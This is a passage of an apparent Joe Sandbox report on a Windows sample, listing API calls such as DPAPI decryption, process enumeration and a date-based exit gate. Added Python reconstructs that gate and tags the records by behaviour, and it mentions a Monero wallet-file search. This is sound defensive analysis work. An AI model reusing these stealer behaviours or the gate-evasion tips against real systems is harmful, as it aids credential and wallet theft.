                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: F.?_$J>?$PHm$^:y$t+D}
                              • API String ID: 0-2466709220
                              • Opcode ID: 8df6aa07e31c7abb7809efb28b4ad6a3b136b155d11d0ebab1269ff8521f0f09
                              • Instruction ID: 85630e2ab29d696f4b0dcdb0a81d25b74cfb04d94db44698c98ee47950ab489b
                              • Opcode Fuzzy Hash: 8df6aa07e31c7abb7809efb28b4ad6a3b136b155d11d0ebab1269ff8521f0f09
                              • Instruction Fuzzy Hash: 2EB218F3A082109FE3046E2DEC8567AFBE9EF94720F164A3DEAC4D3744E63558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: t]y$&sG$W};$hCk$l7
                              • API String ID: 0-3755676267
                              • Opcode ID: 9b6584f2d1da8b14cbbba441c87703884d849b12afbbfe5401ea5f193188ef5b
                              • Instruction ID: 0f692b0612b1e60ed063550565d656137fbdbf2db9462d1f8794af90c3ef7c40
                              • Opcode Fuzzy Hash: 9b6584f2d1da8b14cbbba441c87703884d849b12afbbfe5401ea5f193188ef5b
                              • Instruction Fuzzy Hash: 5F9205F3A082109FE704AE2DEC4567ABBE5EF94720F16493DEAC4C7744EA3598058793
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0014C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0014C87C
                              • lstrcat.KERNEL32(?,00160B46), ref: 0014C943
                              • lstrcat.KERNEL32(?,00160B47), ref: 0014C957
                              • lstrcat.KERNEL32(?,00160B4E), ref: 0014C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: ddce902649e426b21418b4a8dcd8280fef930999bb51afc999c4795d60c8a200
                              • Instruction ID: 83bad6f8a5c9326978972fcaeb9bb42f8359a7de2afc8c91eadb06a1e5fa475e
                              • Opcode Fuzzy Hash: ddce902649e426b21418b4a8dcd8280fef930999bb51afc999c4795d60c8a200
                              • Instruction Fuzzy Hash: 8E416FB590521AEFDB10DFA0DD89BFEF7B8BB48304F1041A9E509A6280D7745A84CF91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Fy$J)wW$_}}o$`l2Y$t0{6
                              • API String ID: 0-2315511343
                              • Opcode ID: 51b1f26c67b5dc800bbddcd69e66d8939d9d9ee16fbf2210bfdbdbc77bd88ff8
                              • Instruction ID: 0b57d24b9dfc0ebb3f03559d14912c877df5e85d00cd1bc8a6c6b607b82e2b1b
                              • Opcode Fuzzy Hash: 51b1f26c67b5dc800bbddcd69e66d8939d9d9ee16fbf2210bfdbdbc77bd88ff8
                              • Instruction Fuzzy Hash: F192D2F390C210AFE304AE29EC8567ABBE5EF94720F16493DEAC4C7744EA3558448797
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0015696C
                              • sscanf.NTDLL ref: 00156999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001569B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001569C0
                              • ExitProcess.KERNEL32 ref: 001569DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: b6c8b054a36b06390497e576ab04e6f46626c6b2cdab332f8c95f677f324c1be
                              • Instruction ID: ae2b462a8a3d50a0da1929141267d3d26ef3f9099d6732bcf5619f55e8123ffe
                              • Opcode Fuzzy Hash: b6c8b054a36b06390497e576ab04e6f46626c6b2cdab332f8c95f677f324c1be
                              • Instruction Fuzzy Hash: 7F21E9B5D00208AFDF04EFE4D945AEEB7B9BF48301F44856AE416E7250EB345608CBA9
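The sequence in the record above (GetSystemTime, sscanf, two SystemTimeToFileTime calls, ExitProcess) is the shape of a date-based execution gate: the current time and a parsed date are both converted to FILETIME and compared as 64-bit tick counts, and the process exits if the comparison fails. The Python below is an added example written for this page, not code from the sample, Stealc or Joe Sandbox. Reading the sequence as an expiry check is an assumption, and so are the deadline string and its day.month.year layout; the FILETIME arithmetic (100 ns ticks since 1601-01-01 UTC) is exact and is what makes the comparison well defined.

```python
"""Reconstruction of GetSystemTime -> sscanf -> SystemTimeToFileTime x2 -> ExitProcess
as a date gate. Added example, not code from the sample. Assumed: the gate
semantics, DEADLINE_STRING and its "%d.%d.%d" (day.month.year) layout."""
import re
import sys
from datetime import datetime, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
DEADLINE_STRING = "01.11.2024"  # constructed stand-in for whatever sscanf parses in the sample


def to_filetime(dt):
    """SystemTimeToFileTime: 64-bit count of 100 ns intervals since 1601-01-01 UTC."""
    delta = dt.astimezone(timezone.utc) - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_deadline(text):
    """Equivalent of sscanf(text, "%d.%d.%d", &day, &month, &year). Returns None
    when the string does not match, the case a check on sscanf's return covers."""
    m = re.fullmatch(r"(\d{1,2})\.(\d{1,2})\.(\d{4})", text.strip())
    if not m:
        return None
    day, month, year = (int(x) for x in m.groups())
    return datetime(year, month, day, tzinfo=timezone.utc)


def still_active(now, deadline_string=DEADLINE_STRING):
    """True while FILETIME(now) < FILETIME(deadline). Both sides go through the
    same conversion the two SystemTimeToFileTime calls perform, so the compare
    is on raw ticks rather than on broken-down SYSTEMTIME fields."""
    deadline = parse_deadline(deadline_string)
    if deadline is None:
        raise ValueError("deadline string does not parse: %r" % deadline_string)
    return to_filetime(now) < to_filetime(deadline)


def days_left(now, deadline_string=DEADLINE_STRING):
    """Analyst helper: how far the detonation clock may advance before the gate closes."""
    ticks = to_filetime(parse_deadline(deadline_string)) - to_filetime(now)
    return ticks / (10_000_000 * 86400)


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    if not still_active(now):
        sys.exit(0)  # ExitProcess: nothing past this point ever runs after the deadline
    print("gate open, %.1f days left" % days_left(now))
```

For a sandbox run the practical consequence is that a sample detonated after its deadline looks inert: the only observable behaviour is the time query and an immediate exit. Re-running with the guest clock set before the parsed date, or patching the comparison, is what recovers the rest of the execution trace.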
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0014724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00147254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00147281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001472A4
                              • LocalFree.KERNEL32(?), ref: 001472AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 1ea3869d5407b01d3c2f6dcc254d0712fe79a9eeec2b44a2fba219aa63bb9798
                              • Instruction ID: 1b697d9f5e35c13f5eac4e92ca19732689f490b86f02b66df718d552610606bf
                              • Opcode Fuzzy Hash: 1ea3869d5407b01d3c2f6dcc254d0712fe79a9eeec2b44a2fba219aa63bb9798
                              • Instruction Fuzzy Hash: 50010075A44308BBEB14DFD4CD45F9E77B8AB44700F104595FB05AA2C0D7B0AA008B65
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0015961E
                              • Process32First.KERNEL32(00160ACA,00000128), ref: 00159632
                              • Process32Next.KERNEL32(00160ACA,00000128), ref: 00159647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0015965C
                              • CloseHandle.KERNEL32(00160ACA), ref: 0015967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 49cb267fc93debf404c14d261d3e833641ddbd12529d08cea17bb0db9e719a60
                              • Instruction ID: 035e544cac885d123cbd0024af54b72a9415c986ea7442ec27d6dc3dc71a0a0d
                              • Opcode Fuzzy Hash: 49cb267fc93debf404c14d261d3e833641ddbd12529d08cea17bb0db9e719a60
                              • Instruction Fuzzy Hash: 7C011EB5A00308EBDB15DFA5DD58BEDBBF8EB48301F1041C9A9069B240E7349B48DF52
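The "APIs" records in this listing (the Toolhelp32 process walk directly above, and earlier the FindFirstFileA directory walk, the CryptStringToBinaryA decode, the CryptUnprotectData DPAPI call and the GetSystemTime gate) are what an analyst reads first when turning a function dump into behaviour tags. The Python below is an added example written for this page; it is neither part of the report nor of Joe Sandbox. It parses call lines of the two shapes that appear in these records, applies a small rule table (the editor's own, not a Joe Sandbox signature set) that fires only when every API of a rule is present, and pulls out the literal string arguments. The three sample records are copied from the listing.

```python
"""Triage helper for "APIs" records of a Joe Sandbox IDA-plugin listing.
Added example, not part of the report or of Joe Sandbox. Parses lines shaped
    • Name.MODULE(arg,arg), ref: ADDR
    • Part of subcall function ADDR: Name.MODULE(arg), ref: ADDR
The RULES table is the editor's; the sample records are copied from the page."""
import re

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# A tag fires only when every API in its set is present (directly or via a subcall).
RULES = {
    "process discovery (Toolhelp32 walk)": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "DPAPI blob decryption": {"CryptUnprotectData"},
    "base64 decode of embedded string": {"CryptStringToBinaryA"},
    "recursive file enumeration": {"FindFirstFileA", "FindNextFileA"},
    "time-based execution gate": {"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"},
}


def parse_record(text):
    """One dict per call line; lines that are not call lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a for a in (m["args"] or "").split(",") if a]
        calls.append({"api": m["api"], "module": m["mod"], "args": args,
                      "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return calls


def tag_record(text):
    """APIs seen, behaviour tags, literal string arguments (anything that is not an
    8-digit hex pointer or a "?" placeholder) and the call sites in address order."""
    calls = parse_record(text)
    apis = {c["api"] for c in calls}
    tags = sorted(name for name, needed in RULES.items() if needed <= apis)
    literals = sorted({a for c in calls for a in c["args"]
                       if not re.fullmatch(r"[0-9A-F]{8}|\?", a)})
    return {"apis": sorted(apis), "tags": tags, "strings": literals,
            "refs": [c["ref"] for c in calls]}


# Sample records, copied from the listing on this page.
PROCESS_WALK = r"""
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0015961E
• Process32First.KERNEL32(00160ACA,00000128), ref: 00159632
• Process32Next.KERNEL32(00160ACA,00000128), ref: 00159647
• StrCmpCA.SHLWAPI(?,00000000), ref: 0015965C
• CloseHandle.KERNEL32(00160ACA), ref: 0015967A
"""
FILE_WALK = r"""
• Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00160D73), ref: 0014E4A2
• StrCmpCA.SHLWAPI(?,001614F8), ref: 0014E4F2
• StrCmpCA.SHLWAPI(?,001614FC), ref: 0014E508
• FindNextFileA.KERNEL32(000000FF,?), ref: 0014EBDF
"""
TIME_GATE = r"""
• GetSystemTime.KERNEL32(?), ref: 0015696C
• sscanf.NTDLL ref: 00156999
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001569B2
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001569C0
• ExitProcess.KERNEL32 ref: 001569DA
"""

if __name__ == "__main__":
    for name, rec in (("process walk", PROCESS_WALK), ("file walk", FILE_WALK), ("time gate", TIME_GATE)):
        print(name, tag_record(rec))
```

Two design points carry over to real triage. Rules require the whole API set, so a lone StrCmpCA or lstrcat never tags anything; it is the combination that carries meaning, as with the Toolhelp32 walk whose StrCmpCA against a process name is what the "Searches for specific processes" signature in the overview rests on. And the literal arguments are kept separately from the pointer arguments because, as the `\Monero\wallet.keys` and `\*.*` strings show, they are the part of a record that identifies what the function targets rather than merely what it calls.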
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 9$sz$Ez6N$R7wu$fI
                              • API String ID: 0-1351617252
                              • Opcode ID: 51f22538ddcf75b624d196a4c142cb99fd343910941c543defa448598d0a452d
                              • Instruction ID: 983d16eecb439ffaf178d1e2fd14e0dee40b03fe0a6a56fc7c2cc9699dad2662
                              • Opcode Fuzzy Hash: 51f22538ddcf75b624d196a4c142cb99fd343910941c543defa448598d0a452d
                              • Instruction Fuzzy Hash: 69B2F1F3A0C2149FE704AE2DEC8567ABBE9EF94720F16493DE6C4C3740EA3558418697
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00145184,40000001,00000000,00000000,?,00145184), ref: 00158EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 0ae0fc4edc70621f6728c693af43edcf90085a85da1995ba4caaa25f616dc388
                              • Instruction ID: 5165df751a61220cba98f65e4f9ce58bde0231a9bc8c1c1e8de714a6be2a347f
                              • Opcode Fuzzy Hash: 0ae0fc4edc70621f6728c693af43edcf90085a85da1995ba4caaa25f616dc388
                              • Instruction Fuzzy Hash: B9110370200209EFDB04CF64EC89FAA37A9AF89306F109449FD2A9F250DB75E845DB60
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00144EEE,00000000,?), ref: 00149B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149B2A
                              • LocalFree.KERNEL32(?,?,?,?,00144EEE,00000000,?), ref: 00149B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 6ce30fa4dce8d465b4bcf59631f2c87b789ced444f287e90decc742d06733a8f
                              • Instruction ID: a0628accc3632cfc88300547c98ae1f63ea4495c3fe8e0cac615d876e7c76f53
                              • Opcode Fuzzy Hash: 6ce30fa4dce8d465b4bcf59631f2c87b789ced444f287e90decc742d06733a8f
                              • Instruction Fuzzy Hash: 3B11A4B4240308AFEB11CF64DC95FAA77B9FB89700F208099FA159B390C775A901CB50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00DDE0C8,00000000,?,00160E10,00000000,?,00000000,00000000), ref: 00157A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00157A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00DDE0C8,00000000,?,00160E10,00000000,?,00000000,00000000,?), ref: 00157A7D
                              • wsprintfA.USER32 ref: 00157AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: c40620b0f8ff26323a711287fe0e9a8dacfc5aba49a6ffe016946294e019af43
                              • Instruction ID: 7296af058ade2061b771fd83d022e02fd77e516c282f533a30eb3d9c409fb659
                              • Opcode Fuzzy Hash: c40620b0f8ff26323a711287fe0e9a8dacfc5aba49a6ffe016946294e019af43
                              • Instruction Fuzzy Hash: 51118EB1945618EFEB208B54DC4AFAABBB8FB04721F1047DAEA1A972C0D7741A44CF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 5O${}3$7\o$Ef
                              • API String ID: 0-1699171516
                              • Opcode ID: e78f54f9c168bf5a4321568b7c9f8f85fbb33f39190377716a2c64ff6c83c67b
                              • Instruction ID: c2b36d0ef3bafb46b6628e3c4d80bfe3513a06bd560cc5ee52cdcfdcea341614
                              • Opcode Fuzzy Hash: e78f54f9c168bf5a4321568b7c9f8f85fbb33f39190377716a2c64ff6c83c67b
                              • Instruction Fuzzy Hash: E852F6F360C604AFE304AE29EC4577AFBE9EBD4320F1A853DE6C4C7744E93598058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 6Ny$Xht$zT9
                              • API String ID: 0-1739400583
                              • Opcode ID: 342f780841e057a41bb44af43aa1e7b94a668798ba55007a56b531dcf8ec8606
